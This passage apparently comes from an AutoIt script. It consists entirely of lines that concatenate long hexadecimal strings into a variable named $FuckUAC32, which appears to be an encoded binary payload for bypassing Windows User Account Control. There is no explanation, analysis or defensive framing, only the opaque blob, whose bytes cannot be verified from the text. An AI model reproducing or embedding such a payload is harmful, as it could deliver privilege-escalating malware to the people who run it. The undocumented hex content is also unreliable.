        $FuckUAC32 &= '8DB6B0A64D13B2FF7510240CF4E04A1830459BAE682DB866BE17810785828105DD1959EB568D8BC9084CFA0420B6D11A6DFB5DFFE0591802A463EF6D7C58121A82CC2E50000C3B7E12B6A74B149933C93B04CD7D8874F4B6F1C61341162D72F11FED0711770EDD6DCCB0EA58B01B8C080544D36A40DBF8AD0E3AC81BC023C1390812735DB48B3CCA06B8E7C3131278CC9A0BF40C67C9B48DBDB54FE20851898EE4EEF0AE15AD629FA6A82C4A77FBC1B900F8DD80ED145E3F07F477E39B25EB063BC67D4DC6A3196A0450B66E578A330E0ECD7C241E1256C287AC9DE41B18056A1A581D7EA9F7F733D2B957EB05A116A50283C12083B36F6DB7C581F90EBB27EA6AFE5E21976DA95B958BC2BE05E985CC60AB3D6DFF8BFA83E71FC1E7060E07AE08816699FEEB1E0289313E423CB9707CCE5F7C579478FDEC4DC2808B5AA6D904DAE14B9C8C6B35F9BFF8D8A31FDF3BF07222B3BB603C02B7FF771A8BCE2BC8C1F905511051A5814E0CB0C52D0C38D5EB0A6B206E43309CE58817A288147D6C13B1B7FDC010502C7481482FCD0CD4DC220C4D3278ECC79631F93BC1721F3D70188160C0CC5DD8087FBF2BC1E84861C864EDB82F3B8CA2F6826D5F52F9701333A42EFD3EBC14DDDB4E21524DCB76A0D770CE82FFE4F29AC16ED5755FEB0F0F4060E1FA07BABFFFA228F7460C0C76BA128D28E0AB2C'
        $FuckUAC32 &= '112C805D8B0E85BB3A12205395BF45C7008907C8138D46146A02E25BB46DFB5805186CEB0D8B3FAB0DB79B383E895E0E5E043C0211B9D5213CFA5F405B023883FBB96EA1329627A10C6A577419AABD41B3FD4C388166D8EE6642832600BBFF610F115933F6400C4074068378391A50E181ED493A4E47D4B960664F1EECF64659830EFF2AFF062E51F64381ABD1D62F61F0FBC65B3498D8977B08473F017243C0706BD5832706777E358E2FD86A50196E2750CFCC465B811D1B1002C3FF7E835DDAF12AA46A3F17592F7FD0E0D61A278C8D4FFD5EC90118C843307804D8A752AEDCD77133E7C8E7F7F58D8DA8FB78DC05BDE09DBCC8C8C8C8F8D0F4D8520CCCC8B8D4228B12EAB37B859C45399D752AB07017C03D9DB4171D85B007B6FFD186CE83C8742A223BF374D2E10E3336B2954D56E8EC05C4E0060BE68DE439CB96B10ADD05DEEF63025B03F383BD2547B5C0060F7C7BE3DD8C99178D41E066E458770F46C10FBE80DCDDCE2FCC985883E00F0D84C20E786A07ECBED96EB9045AA1A03BC20F872035FF24BFEEDD76362A3624838DDAFF98ED85B8F31C793E85D08585F885CADB77BBB029C66583E820744A0403743678B7D50DBA252BA3150D0F85C8097216FB9A498D2F082A0B040122230301815613B3C3980E09685C5BFB841B05D4CBC704888B7FFC084E76035E8BBE896A5D04F76F'
        $FuckUAC32 &= '8F9D1D94318BAB6BC00A97C98D44CBBEB3D908D0BB72A5D900584506B99026F411B02139EC0D52F4F4FC2D2F6F3FF8497457046874466C741877C1DC59B9F8CF08D400097084D3ACF03E6C7517B01641B3366003C20C100B205EDDBEBD0C0636751F3C7E0234755BC604932D21833E802333097B9D9332A56E235936578A649E8D08692E916564196F25751C825946967813580A3269F848CFA08B0C518DB5E8FBC73C9C4E112E6807C5CFCDC1EE608F2F6842C002536BDED86D0E1B25747E1441741059030E5C0BA5081EDFB3006733826C4898D9F94031307F1BD2F4738D9DFCBACDFD3C4B0AF0850F8D92113AB8E7677C230631254FF78530B0CB5E8273741443233B1B45A4C15A4D178BBD58C761CB2F1ABB2806F625D7F602C6200D72CAF72BBCB6AB0B5C0B2FBD50811497E28D2C13ECB50C548E10B3DCD676CE8A06F52D06093E473EB0158D51C551370146B03BD2D846FFBE39CF7CD09A27F5DC0AAEA11866F5CE14079400EEC1D5D2C2F63024BA790F7B33006E9B33F6469EB5D4B4FD7A599485A4424288F1FB45AFC03BC27514067636F7B77DC9A1FFB0AC5319C806AA720BCEFC9B5007EC52665B1C0F4DB80066891BC4CEB35921E389B5A44D41920A8E257C8BCF090BC0480465337100BF96D1FE0CBE33741299BF1C08DF59F83CED2BD40BEF42B211FB0B864ACC59163770BE5B'
        $FuckUAC32 &= 'CFE7F801E00165C6BE030867B71B8F165AE997B07471046E74B613DC8F28B185A21B0E806CE42F82B46908746118E8D52ED902E437B2684FF1146E0DFB94630536AB0C6627B5D9067CC966CD080A0959305EB2B9B829AA8C62331D33C00AF410F7C17BAABFDA0BA6A7198B570469DB26B968C6DFD2751680BD2B67755D9DF7AC639FB251390B7E063481BD19BA638DCDA37E374011C65D28564E281524A33F6610CD5A3C10868BD8CA52DBDCA3EE3875359E7824901E9C5EC6F647FC089403FFB5569BF1C60AEBB9FF643119F81063DF4E8D355310BD70E11BEF057DD08BBDDA151C81E7804CC11A05E91D82F652266B9CB1532B7CCEE718FCC98599182178803B2D75119C648820900CBF53B63ACC36272414C8B35ABC3837963E7E240573F569FC478D81D9FD8C3BBB5710124ABC21FAF0E1A66A303B816C4030586604E84A6367CC2A83740FCE5F0D5F929A71C7B210184D50A0657A5AE978A542C3459B100A9FBF3FAF7C2BC0EB6E0599EB138B14E85FD6C403992ED2241B85D27F177C202DFBEFBA7311F7D883D200F7DADD0908DB42C39099FAA97537FF3DD280D1227F071A095818B1BE26F7CF1388C452B7B00BC7E3215DE79E011661FB06170C05F5637FB7737F0621742D8BFC99525057538AB12DF0588C4130E58C1FC2376F9B67F9394F038DBC880E4EEBBD96D978B3BF482BC646'
        $FuckUAC32 &= '9E7552ECBB728C14AB5F640C80388F9DEEF4307454FFBE74F024C60030B4AC1CD6EB3DF6541F08363696DF934B0938DD080AD5481793F22BC92CCC8E1FD1F86603B828C385B17385A883A8472BA931ABAE7DAB036A2DEB0E18072B956D35367AA8027492205544CC3D12838C5FD88BE82BBDECFE18B188057A77A80C7524EB1EE80CDA0C9137924F02AEEECE0ABD06286B5963D379A8BDC6DEEC3345868BC19B2C1009CC32B3ED190D6923560859322F0A8D426C8B04138B65B05B270776785B9E5DC9E2C26B234B21D46B5AA000022381ED7E6138F088810C811F18A957504B7CECB5232C228CD97E24A41ACC6FDFB1D96E6B03BD2059557FB0EB49B677AD2E89132942EB25D1EC6ACB966D0BF0D7D0C94C0E7630107C33D0742A6C410E2432299E3BC41B835EFB74135D08C7A51323C7191D598B61B7B4854EE2FC16BD742F8B95A033C87B64059B6C1F586BBDB43E03A360DF1B1A0BF5B4306A027CEB9A4B73DB4A21C7031FB1E320408D3288AE6999E01BE86F1CAF1844657B3062B35D2865896C038D2BE0DA78990C70FC8965E8CDF8586A52B80790F7F8C0200E8383C31118C418441251D304E004205F1855DEEA2D55B835532806C645521D80D6C84B96C0F6DF6A8398FEB08B4E0403CF330C38C58015882D0C0CE30F9EA50BC445F004660F194D1AC156DFA455E889537B5B67B7ED6D'
        $FuckUAC32 &= 'DB084D62FB405F8D494B047E4C862D00ED02544486CAFD00D0ED6EC2A76D148BD744531E7401E1DDD6BE7778407F474ECCD87575CE807D518C5C60AD249082563AE7661083F4F0B8ED47FD37E0EBC9A0813963736DE07529C6B944BCDB784A20680768541CE2BD10FC740F8B55C552FF15177CAE102D09A3118F4E272CF1029C39580CF76814D3B79AF91A0316672407480C9EDD166095E64808E035BA606E811F9B39530CDD4F08567ED18ED8CB54412B648DA120012CC40AA2C47D200A95A0C333E295402C6089431889C85CA2BB362D2E56631C46178C045F490C40756F645992057EFB5F1BA1168BD0C1FA05BD83E11FC1E145DE0577C10C95BBEB05B9DBF641247F0585D3191D2A198A9193CBF66BE028E0048DB85B3B65ED4024801E824DE4D0A775BFD1C6C219FF0478F80E170141890EEB2784FA506854D8022D378EB92110D9D5B4B959116E0C0B850C8138AA7FFF2FFC2A8378100375F240143D2005931974153D21060E3D226C882F3C07C7409901754155FA62838B281E48332D43EC82559138911285B063BFA68AC9150EA0500F104189123405ACC77FEFE726960B9B8F59142190CC6A245B7488083B7608F9FD6EA046368BF007586705194A62E433F258584956443317240BB6E65EF2D4A0A3600AC31CEA0261C177D541C13B750C72EC7A1579968F9970197078A89B3D520A'
        $FuckUAC32 &= '8F1259E4CEB3A9AF2B7D44042C762E17BB9B5DEB75540411397959C1B81B24BE68BC44740428783BC673D8632F77851170D083C7FE72F16774C9D7284058146974EE5125380C6A6B8F1510F9D80C52F62086402C848B860B538E39033916C069D800A6E602477C608A4510A2D48EE630A127D1A02BCD68C46317F8024ED8895DD0E874681664B56D097010D4D413DC05FB08EF2EE0EF040B3BFB724B5C390774ED0C37FBD8BB3EFF3736128907FFD34F122A1AEDB042393D00AC6DAFD1FB13475E890A5577C3C66D8B0AEBAB6FE40348817D060865A3C554D05AE408599AED2D0A04EBE620E058E019E792A75CE0E0B16CA9503B2FFDD65B1EC7F5600CE3400C113582918CDFBA1F740827DD819E351CD65400252ED28E6B09996C5D15010E28D9926FD80F0E01338B38B088D359D4D7044EC484BD224B1BB74B4D0CC5148E483440C416449F81DA72EE138C124C5330908746FC01432E2D05DF56477A44DBA9BD044DE4A8E0F47E78DF032CD99A5D425D0401100700DD877A7451B00018EE98CD1034D2FE4E2436B7A1AB77358F846814C0BF2F6857C6E63004665CA1749D1F1DDF1EC404931A9A5653663DC4D7197AA4A2709CBBFBBE591F40831ACBDA549A379B896677C72E82188640953C762A0C6E998A0D50453DB52BCEB283FEDDA2D1F9404C2BD953B95BB9E4F7FCBA55BD9644BE5692'
        $FuckUAC32 &= '5B444FD86B7175A505F2139168107837BFDF2001C78EF81659D8EB5E530088D6D81B6931656AF4B19807FF7621DAC746207441A08A0C47888C0508FCC48D774B66391C470D403D3772E853E067FB5AB860500608885DFB46A061311610BB942B20842C1D7AB8F0200342761F751668700C8CE271E0168564551048A492C177F089328A4E5CCD8BC157391041B897A8A8618DB99032A5708FBDDCEF81C109C173041A3C10B73A52305008097507DDA2063F4333CE83337560081393063BF71001F92354097E0B315E60894E602EA5E2B4B09A08DEB61BF1BFB7E0AD7E08643908FD0C81F95F7CEDFCD6DE4A5B14643D8E0AC209C7466483F273D84F987E3D900F816E3D913F87FC1C845E3D93854E3D8D73C8CF21823E3D8F8641FE1CF22E3D928A1E3DB502FD6A9E9F8D0E3DB4078EA17664D7A0352EB1FFD2F398A9E0049AD8DE510CCF5B505F9680127F5587BEC457845BF12416ED1A673487763D1D6D3CE374014779598D00022F6641A4FA0D9BE6536A044757A5D4D5A7A0F482C24C3405DAEC59032B654BEB353744ACC0C2D6BD3B78DC22743223EA08DC305341B577895F46F9754983C37F347E2E3BA3D82D80C5FF42B0250A3C05ADE000D98860E457288E595BDD25C24C1A48DF960A007FE4421B820DCE3351A3D241891390EBC6F78BF1C707413924740948EEAE16686E9331F82275'
        $FuckUAC32 &= '1420F502FCC633C90F0F94C16A22048BD1596CF5B66D35FFA9F628668B08CF0EE8A0EB1AC8FF081966D83BEEEEADE838C875207406050975BC27A531B8B5063E264EFE3AD21BBEEE998D103CC5332605250A948D6DEF3DEBEE83E804DA1FA58AEB6E2DE0FF070A3DEB04294297824C1FBB5C74F69D38F6C201136BDF766BEA0C10780211054B0D722FDF6F5D693951B48905D1EAEB104AB06A3EB7B9C95C59BFA7EC82B32450329DDB6AFC828C1A6D7DC3DE06F40CB62A50813B0CB3D3C70812130A3525D1766917B03BC23689109F5F8765EA2079515194E3C8E8584BD0905646DBE7CA98FE00CC07D69CA169583BC35A68049B6DF866EA57FE0DB75B97AAFC502C5DF8668BC7A5341B606383AEC8FC1481063F736D8A92A34A6B4BC6733F002ED46FED5903C003C9AB3450B97F5DE913319F27408D0C9E5643DC00DD8641114859FD38598900C4E8E28503DE2D553BEB677AA43ED0F1736F0D43773C8B0E7410F107B6F107790875F8F0532BC68D58A6536CE0AC2C70F8FEFF3BA06CC0B5ADD65B35F127475CA1DB60F5E64D4C8745B46DC178293AB4FC205E56E6F1931A746CC1754D39478D900BBF474D5EA362A2CC4450736DBD2DB43678C648F866C740DA0ADEBD744B6203081FC640210C3388482FEF37AA9D4B2F1E8D50FB81C640D5D9BAFD3BD672CD5357AD4DE6F10EC1F66CAD7065'
        $FuckUAC32 &= '0A0318280417EEEADDEC03C3BE296C3BDE7C6FDE390AF6BABF1D6E7D6BBF0664A19F06C6FE6E845183051B208D8831071F1BC556B031932803DE1FD6EC66B7800733009F9C200A2F69CCD0BBDD0F9203CE943BD172D2706282B112F57CA29A09339EA7BE6A4272D6006B5C57685DC506F98A099D4D042EED4E586C0B32B0853D8BC0E61F5CEA52156180C1E68734857FCB70EC3C8906D9E388460468A00F7156AA009BEF35AC5B4D5F5D03BCDB4638F88DFFBE1B976826CC7C8E818BF342352FF5F9C641067B0B0680AF80EB712FF5BFB6C64781A76AF658EB0A8D44F7D81BD478F0B6C0C9F553E507E0649B0C81163E579B332579FBB9FD74893E45027540EB090A0375045F73A7AC0893742C8F5926C7B806FFA106544383FB030F8CB7001AE63122F34BA833C097DF5D38BEADF69C2BA020BE045760AE0446C9EA25164A21CF28284968D70984291B6BBCCD259E0A51C0A1919C12B7CE60155C10A4F8003454FE5FA85357BF4EE640BBBB0DC71A824B4B3385A809F791B02F30E9D8C765D8F84775FC3390B1C74A270BC833F00784069C6C65C427F0C095B91BDCDA330C113BF77EBE4F59DFF8256E9185F3568BC60D1147FDC1E0100B151DBB9DF080F7D607085EED127CC018BECC40BA54242ABA8BA5E84C2404C36968442408ADAE7809421681FAC67291D8546E004ECC3C4F5D436FFD97'
        $FuckUAC32 &= '5805F9A0047231F7D983E103C82BD188160ABC41D90183E92653C86ABBF9DE680803C10610CA83E205E93B67DD2D5CF3AB580A27EA60862140B75FC305049652D128DEA812F58138DDF26A211C12975D3CB71AD0B1685518220F3BD302436FDB7E1F3814654938180CA5ADE83748F683C9FF8B7848E163A9D6ED7D01402A1889A7C324F1B5833A40F614452450686B632FD8E317286B0CD4801693F27D1680078DC49D5D2483C5C2AC3947FB9F3CFC8E37F8CB7E436AE01958F7F78A72378D443F08E0DD2D2A0F547713A35EAC8BC4FBB92D6C631CC720CCB7EB115E0D59125B0B78A509CA8075F46C5FB602138AF4F474AC5762F4C99D8A100AA06D50306B63E6E098D4932058C1D74325D649C319BE6DA1DFB972854D4229CC2014AC60676F0FC21F0F8FA3B81C38D85B836FB7BF433DFB7E42BC6976EB0C366A7716B9B928D12BB1746897B9055061809574BC0C60CDD62DC2FF283F62F8F0652B6DAD21B322B0D6209506CF958A5681ED8626460578BC53D99632E00B57CC3D3AD65937085E96C2C9477565E4F1FCC9E68204B94A7EFB04B3E7D80A28DE4957889E82653F7AF62C6812557C8205C63292441E2B2892031923051C1CE79291E72014101C13FF0B68F4297F7E3C81FFF01707B40A617734FB2E18D1D66D74BA583F501C53A4113EDE211FC9011C4668461ABA11DD50350CDC53'
        $FuckUAC32 &= 'E70064402CEC2429595E09263D231C8578D70B1433F6BF9EA0833CF57408FCB5A5C4931DA309C089385CAB4960E3FF3011185D0C82C67699BA247CD39FEC83242800FBA9DA1A1AF1495397B856BE135ADCC0D61A3EC413837E9C2CA254B5D1740268415B40CF59291A8CBD2367BCE07CDC295F237659F9EB5709297503501FE6EB42F09EAC14FF34C52CDDE2648C08B66047B402273AB7DB0065F48E24EA07BC6A1E8F8BBEC1C71A2334B0391E7404EAEB6D6A18463C4C82C9E00F68512CB8720CD0A50A46B8159A47192F752B0B576C16F110077517D334111BBC0528E4EB0BA5EB378C3865EE3FBB86559D544D88DF128D8E009D9AD97458025938897AA2B7119E367C0409296F362D37F63A30EF6235F01EE032ACAA506C18568C616D588958C1C8BE394231DC61E9379A584FE80D71275BCBF0761F60E48D7668E6E286E803DE14BB4B60869AA0B9CA7844CA96846ACB49D8905C8139C64BC3B73E77B2495F5A93942CCA0C74622043604DC12850EEA4096328AD830CB2458307080C107632C8201418360EC820830D2007242820830C322C3034010D32C81C383C830DB29DA94012404407480C32C8204C505432C8608358825C60C820830C64686C20830C3270747826093AC97CB6809284B9E492CB0A888C90E4924B2E94989C934B2EB9A0A4A8C925973CBCC0C499EC5C72C8CCB2D0E4'
        $FuckUAC32 &= '92CB2EB80AD8DC924B2EB9E0E4E84B2EB9E4ECD4F02FB9E492F4F8FC0001037BC924040801B22EB9ECB20C18100A1418B9E4924B1C2024E4924B2E282C30924B2EB934383C422EB9EC40B244484B2EB96C4C4450542EB9E492585C60189F16B890767443069DBCE8C8D865402B0411ECCF808C0C08F030BDBBA8D292185A55BD1C8DA461513EDF9091CD4014490CF49101191B1011F81403F21990FC18BD001C3232202304200832202303240C38FC021234204FFDBD241990CF8040BD2844202303F2BD2C48308E5232324C34DEFC72B155DD0B90C1600704DE240A2AE1104382448CC028D4F90B0374807331B84007A8C4E742ADDB003D40100C8B0D6440096C2D4CF00441EB1DC97E0508AE6DC6C04BDC032115286004B477034D0C23C13F8F4BB9097156DE00810CF84FBC54638A020AC1C2010FAB04247D67AAB90A8C7E1783C1018A06DDF8B28C1AC6A373EE8BC13A205EF4A6AB814F6F0408F7C203EEB67853CD3C8B023A072E34263A615BBAFFDF08250AE4741DC1E8103A41027519141103F0762B155B5704291A75D2EC76A15FA87F901BC0D1E06101C343D7B9F6A1B474188F8B46E7809FFBD93A34DC1702A4668B185FCE5B54F334C6C5BD89EB958B18B088DF57BCFC5B816A51D4AF8BD103C63BFE763454976AB95F82A0BCF9FE36C803091C132D83E70F83E60F8DBD01DE245E'
        $FuckUAC32 &= '5F75176027F7C7CB14BF15AE5CF1F7AD7229F3A5FF7F1B5CAA240448D0B1BA1C83E904B3FD22FE720C83E00303C82647E41E8D775DF76CE09007649013F40820034423D1B617AA0B468807988847010502195BB6E6560859C6C75CCC8C253324732B2501D924CFB20202A6902306F26CE783C6430188699AAEEB06C703B407ACA49C69FE9BA6948C848B448EE489448FE4E8A6699AA6E8ECECF0F09AA6699AF4F4F8F8FCFCE10F828D588D9AF003F80DE84CF70EFFF403E8EF49036840A9DE8FB1B0D9C05EA10BFD11CC90105CA3110E2B6410DE3E8D7431677C39FC83247039B6BD0DFDE3FC774A6CF7D92787E08E694A1C4B93F92B74DDB3274970216C900B8003A4BBB5C2D6CC6D033E6F51EE015AD80BC8F3EF01B29B23E4E92E21ABEE2902884978CB06902724B3471BAF6C2D03B2715640345DB7305B0620032830D0344DD33840485063D3344DD39B1C1C1818144DD3344D1410100C0C081849D334080404D0345D7723057C038494A8B604D7928FB7B58B0F61600B618713BBDCB4B009CC00FB04F7C13D5B9AFE74248A01B0844E1075EFFF01B92B4C068DA4248B01BAFFFEFE7E034B816BE9D083F0FBC2090001A3EDEEC681748341FC393284E446A900BEB4399398060774DACD8D41FF4926D9FE652BC1C309FEFD21105690FCDF1BAC1F3256D80CF18D46FFD9D5C9B355991080DB'
        $FuckUAC32 &= 'F56455C01355476A035FA0DF156DA9E0DDDD807D548BF7D00D809FF9391CB0BD04B0CF25E00BDB83740F50486197035CEC1D0040FF147C282621E0B1C380DEB811FF34B059BD8CCD23468947EBA173D5402E794C2F01C0ED9B3887408BC880E103A180F90013BFB85940A9D17439A0047C815AB72B207E2C57500B30F59BD3916908E40F2EB5886E0F3784E724FD89DCFD5BD409C94E0C2083CBFF5F3883660412A682562A42AF377A501375DBF359EBC81531A02FDDF26CE980BEA41FF6401468820AFCD867DC59F7D859CE9274014F276A149CA08049D4DB02DCCCDE509F852588754D350F8D617B19C1E5288D3938748800508007C11B56C62BED0FE125358955FC4B8B480CF6C11E463E5CA22FFA7511744CA01E35046C6FEB19397D1514B10F41EE25961A130945DC7584ADDD7048D0EB8490E0E088090F8237642D80361C05784DB9AAF490031D5E481689DC08158701971043FE8109871A413BFE98300401BB15B372121ADE10143E05EBDEBF33F9058B0CC56DA17FC1E0060FBEF00414405D032482254A4C5000297620401050006E084EB6D1570F85300483615E02BB8D5903057B1D2E10CF220BDA21DAA0305620820B43D0C50F9459C9A185FE8D42C40C8A4024247F3C02B51459B253953C480A4225CB019F15BC21DE3380745D2F45F46A05A1B3A93037C16EE2766F048F5037EB'
        $FuckUAC32 &= '5D3362F07E3023F81B3512D98A4C3DF488086AF6B7190E0E681056376C2959862A35BC3DC8473B2F7CD06673EB11DADAB537F9FE780D2E0C6689D206CAB1438D2374306AB53BC442007E83761DA96A68B79258A18987102F35E80B54FE2872E64EF031A8682FC80133C917A26590A36B4DFE6F00136C1F15395D107410381E7512C0511BE17B7D0546B8C2508D0E82DBECB76014F3F4395814751E242005B8ED06D60E25096D87262AC5CB1A1A0676059700737D5A88ACA50B7D242A017E2539227C2056375C286873B7C2525251566A11B836F609FF7004C4D82F2DBDFFB1AD83243B327220385E01741B8B800C668469C16CCA6628899B0DC686365031A92A1F8CB1167324B01E946958C9B9029B695A426D16B0DB58B13A4FEBBAF46611496A1722DA10DE32EF1709DF9E32B7A60C4DD489C80F250258E12A8C4B060F41085A0A5DC458BA410356BB140B672836B8E03A44100B88D2F721D86DD49C83D707599464A5EBFEDD17C88BC60703D1EB470B5C295475EDFF7F23D1E9D1DBD1EAD1D80BC975F4F7F32F25148BEEEDD22144F7E62D720E3B2777365AF7AE515D2B76094E2B181B12C54D57A82D09080CF7DA1BC4124B3FDA16CA2CD940A2517D675E5E5F769F2B552E6B9914A11855648958A81851E352B81B42C4934E648925C0773F89F5308B58082D2C33198B70FF76B7B444FE5A'
        $FuckUAC32 &= '3B433483FA08043BF2762E8D34811BC4F6768D5CB3530B91837BF77EF8157075CC5A8B43207021B924DE18E60B0C47B0648FC609536C40335FD0EF8C5417F4410468B8AD338874833806B033C80F04CBD65E6A6818FF740210148BBF676EB4522C23C68902B8192DDBBBEDC3254C1029FF711C021828785B2092289C55F1538BEA538382010A8A2259030B3F62D15B24EA8B8FC17848348FB9A21DC933D2E6133BA80DED576A401653664C7DA642E9D275A95D646C5251DD3A2A64F1B25F0800BF6252C10C96CAE03F05A5820A413C03C181384905EDA9C1EF66C342F678E94818B8C28BC23E3FBB00D13A8548312C41148B1495805B0571062D0DC005B018185500156C7807AD3BF972099503D96DABB6B8AF0A420A2885E86A1744CA62A88F310A4502E4A1C8C9AE82B320276875EB466E11A8538C54972D13468A98EC5019CC4C3AA8C4520D4059E8C20B22185C85E001F205DA4E0529DBC881CC5410FBB3C0F9DA2E8B9505113637BB520609B70355F4D26E6B177FA88339EF14A840F1B9B855DFE707025FC8208F6188668B210A01A994A24A94677B76F024452B4A619FED109B6BE680D675FA2DEA528B447900307C82800C18DC0282755166308B38CAE02457675FC06D376A30B41A823C4907806ECA5040B5817E1870D1BFE636DBC608740EA9401AB8AA2323183330000C060E6E6214'
        $FuckUAC32 &= '43ED12F016E01D10092B5B6523A081055E3C08405375C9A1E840551660A0D0430DD090B86E16BB80632177397936A20398C155FE5DFF00CFF37DC9220D0404080C10FC2E58164028905456395004B104BF51B5F16BF60C03DBC003D868BF8CC672EC6BC90CF65EAE3A008F6F051E02F661B259682CB978BD20A208E1B70506165D3EFB0B7F4B7402AE44A95B1F025974B4031B2BD899080B75434AF828FB040C9108F85843BEA217D1FAEFA104EB55FF775CE8F2957A7B7B62598D709E06EB514883E80FF8931C42BF0406742148742816B9E7DBE87C3E0CB0160B0855229EE708EB0A1010C02B11CC0EEDB8B3CBAA8B1641CC6CD6204A159E59E0A2B93D3AC4F6FF0BE4AB80B98566A82330CCC60AD1BBFFD21DD2FB0475AA4F60894DD489476017753E9F81BE6C0D64D0C7476466112CB163DB084E4814DC084C030E6E680596397D6704508B575C45BCD10588110883DCEBDD85EF258C8D06CA580D431F0144C3C6C264539DE0D4194C8BD245145AD2580F008B58586C1B966F68CB765893060AD064BB097B60CC1504185D0E2400BC901C205DCEA94731C9CC0FD7D38858CD117A23FB289E44F080067857282214414C4AC11D446B9CFC0CCD0F8281F6F1A5FF27FE2BFB8D47045804727553B06C22B543F0BB0F593BD87348B86D08A2448B0DB603C3A905C173A368FAFC8B40C2165442BA'
        $FuckUAC32 &= '4652153E5C326EBDD2C1FF02DC34B8EC7C2A0ABF2E303D0DFFD750BC725F5B0C56071764DB6910828311A16A0497D83257C0F83F2C2A0B00AD93B8189B25438DC4518A0CA2282ADCE9212DD2836937E484DC86589E59BB29530B58C5DB06B2EAAAC9A2ABF548A02405C891904A8FFFDC1CAF55BC431367EC00DD1BC1477D245FE8757D8699508C82B138ADEC9280F61B7385EF101A2C53ED8D80413A59FA685432587B7F181C53A3441D0F0845461E322898EC2C643F03F509344518D45313AD091BEF30A104BCE8EC0C4AEFF0F77447390D2B743F50F20ACF57003619EFD0742C005EDBA11B3B46198DEE516A850501B0C1AE54F31206F695016F031B2DB1812E002AEB33583180B706E3DF7429505E3CDFDB1A66EDEC3B192C0F1B8BDD988075EC1C6E2413C496111A10FEE4E01C6090923AE5756B8C40D1C4576307D71545A158FF6A165E89303B4C2817708B389285C9026D45FB3BDCDD8BD666833A00AE484F1528EE0AB2D5E72BD106DAF68AB81B040AFA7B0317CE5C572A0E4EC2305122C2496F340F81F1EBAA5155692B0585A5BA14D006592051EA6DD20339550CB0CA2D2587B50F8C137C966D1573318751D095F60DD5E60D1CC27B188BF22BF18C76DB0C720E27EB227B2BF21741221AC40C663CD5ACDCDB064FA74B75EB5023A917894BA585799648B5B90D7CBB0C6A5016444AFE'
        $FuckUAC32 &= '58825BD664D5B0BE81C913F01E78DC1EACF45475F52B0DD1F8C89A2AAE405C450D05C0445C1E5ADF2BD027998499210BA54AD4BA0DA123BC7725781E081AB4B78D027E0C049B7B116B1B63BEC855065B0CAD1F20C100660FEFC0A34313B4418EE0297F3F3623DE62E27FD0077437661FF33CDFEE7F0103411004203040DC413FCF5060708D890D4875D06213AD35B737444127EB03D0B6ED35323F061019F65837DEA86D9D1C1A6FC1EA02AB8919BDD08A6F15044A75F866838819414B052FBC20FA5B5805D8F7DBCC2BD71A2C015752DE311B34DF5B8B0726FAC1EB33014B8D7453B05A74526A0AEBF08921403C7E3C0F58017F351EE0776F551ACA9C0015684A2107850450030368A0A5B05044A10B2782F41A620C5EB18B07BEFECC38740D53CC766BA95B106C5240100620580B0379A6205E180D243A90518DA536A2A6A92B080F10996C47F51BC90BC1A277AC1507D0680903D3F509B83446ABF1E70C739954346E095D0FAF9D6C1D1B6849900146AFFEF613816E600BBB08C8B0322298EC12154D1C56C4D23A24C0F56D6AE40D9080D345451001621182061C750B25C50E742668155F6D0DB145ECDD29713A4D57EB3081442604176C46F8B83BD92143407E741DAA76CB5624E014403209BC0216D809EBE217123009DABECA8C2FA6CB96E176123597390940F87894B60D3472F1515762'
        $FuckUAC32 &= 'DED9283C17FB85C1D16DE2EABBDD337E65EB068D9BE36F06034E10045620E7693A365E30F6074F576D36BB9B5F6F6640046E5076607E702CCFF3340A676F777FB65AC3C6FB8DBF05B9A35649726F5907D16F48176F6005CAB1FD8D76108D7F1023EF14686C2F3888C11889168917180451EB8ABE044975F33803CBDA96D836E346470FF7755FCEBAACF496A3A5212BCA514D20092B453E1688177842F4B27E94485160358883CF38B22203584D0BC68A9B5A4744ED8374389E5693159F0ADE799D9378D56E0480D9DC0541EB1254A46A6831C90BAF80C246B0971CCF66C3287216B1861148513E50AEA54A85F653341648877F6B50C9E235B842212C7E2F265A4D0A612A4BB022032F6203EDCBC0C2F4BEB8E41A54413950DD54EC0CF7798534E5067133D6EA380530397D10D2B0BF057A68FAD51F9A398938A141D088052246913108DE7FFE538D1C82037277FF858A2D2402C9D0F9899D2453888D3F054BB4460D4D0904C827C66E14978BF7D169751D5D83FC6F6425D35E5BE8F6443804201CEB8A0A330D6AEF7A102F2210346E56ADB6CA6C6FCD990203260704800C8C00588AC1F66C0B48BD2D855B2B20750E5023FF3407A968746A142656F6B6D8379B2D603BF1740C389A0F50C2423082F31C9D1275D8542C3CC7852C14DF6633BD1B0F8623B40E408A853484C57E84A0C0278A0B8BB5'
        $FuckUAC32 &= '242C6F65BAB6DC0A6E321C7E03C783B4F6FFAE7863158A50348855F4884DF583600ECCF029FE565B50EB4B0FBEC13C6F59060A7F4F318D732BCB031879345B73DB3BC86CA5582BC24453F00165078F511D84927681B11B1843FF88EB0A0153245D642E6C236EA96A00DF66A10547F48D8D2351110BF61A93D63DEF2B98ED01AA303D644A197EBF672C56A38B85D48B003ACC7C881119710A043C160A3C5AB22DA12038EB02F87BB5380F8CF64ABDFF980BC8ED0053CD0083546213B60DC60B0D58B138EF6C66FB290145B0A2305D8B2FC41F69655C3C3E3C02752105A2A1406133C22D69C1F77B6CA1C3838C0289B5DF898D79FC2976B02852FF13B1CE59663BB0B1733B24A085495402A76DA3A051442D50C6D98B0D602C1C872C8DBB55AC8322396F9EF9FD9650FBD91F68788B0E8A132388540F340D9F8F16BB170F3818A49A38A10205B3F676E6BD3F6DA25A47D3F13010695B4DFDC9D22DC4F8CB33F62B083248183BE087D2ED73265C434144B480FA0A4BDB3FE67887C6000D404688100381F8131E9E950BC372D5322BF0C328BC40884D11C64302DFC2B1EF2701BA3BC6743B13C3416E6DAC2B103BE8E26CFFDD856C67BA02B4CD48D683DF63D6CEA540BBB9B2765ECDD92F7CBC43AA1303DE03CEBF831A468516CE01B5705BB3906DF6DAB11603C61342051614F23DB7101081BDFED9'
